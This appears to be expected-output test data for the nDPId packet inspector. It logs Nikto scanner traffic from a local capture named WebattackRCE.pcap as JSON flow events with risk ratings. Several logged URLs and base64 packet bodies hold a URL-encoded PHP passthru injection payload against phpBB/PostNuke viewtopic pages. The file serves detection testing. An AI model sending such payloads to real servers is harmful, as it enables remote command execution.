{"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277737,"pkt":"AAAAAAAAAAAAAAAACABFAADIqydAAEAGkQZ\/AAABfwAAAcamH5BRA5JApfKSEYAYAED+vAAAAQEICp1m\/xGdZv8RR0VUIC9sZXZlbC85OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277739,"pkt":"AAAAAAAAAAAAAAAACABFAADI+OxAAEAGQ0F\/AAABfwAAAcaoH5BlRMHxT\/ad\/4AYAED+vAAAAQEICp1m\/xOdZv8SR0VUIC9sZXZlbC85OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277741,"pkt":"AAAAAAAAAAAAAAAACABFAAFdQfFAAEAG+ad\/AAABfwAAAcaqH5DRIHj1tdpDy4AYAED\/UQAAAQEICp1m\/xWdZv8VR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM4OCkNCg0K"} -01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}} +01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277743,"pkt":"AAAAAAAAAAAAAAAACABFAAFGAG5AAEAGO0J\/AAABfwAAAcasH5AOKDl4jiUqhYAYAED\/OgAAAQEICp1m\/xedZv8XR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzg5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}} +01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277745,"pkt":"AAAAAAAAAAAAAAAACABFAAFddiRAAEAGxXR\/AAABfwAAAcauH5DeiE8\/TEH5WoAYAED\/UQAAAQEICp1m\/xmdZv8ZR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277746,"pkt":"AAAAAAAAAAAAAAAACABFAAFmjyxAAEAGrGN\/AAABfwAAAcawH5C1dLY3dpi6dIAYAED\/WgAAAQEICp1m\/xqdZv8aR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277747,"pkt":"AAAAAAAAAAAAAAAACABFAAFrmeBAAEAGoap\/AAABfwAAAcayH5AmkqDEx1CXDIAYAED\/XwAAAQEICp1m\/xudZv8bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
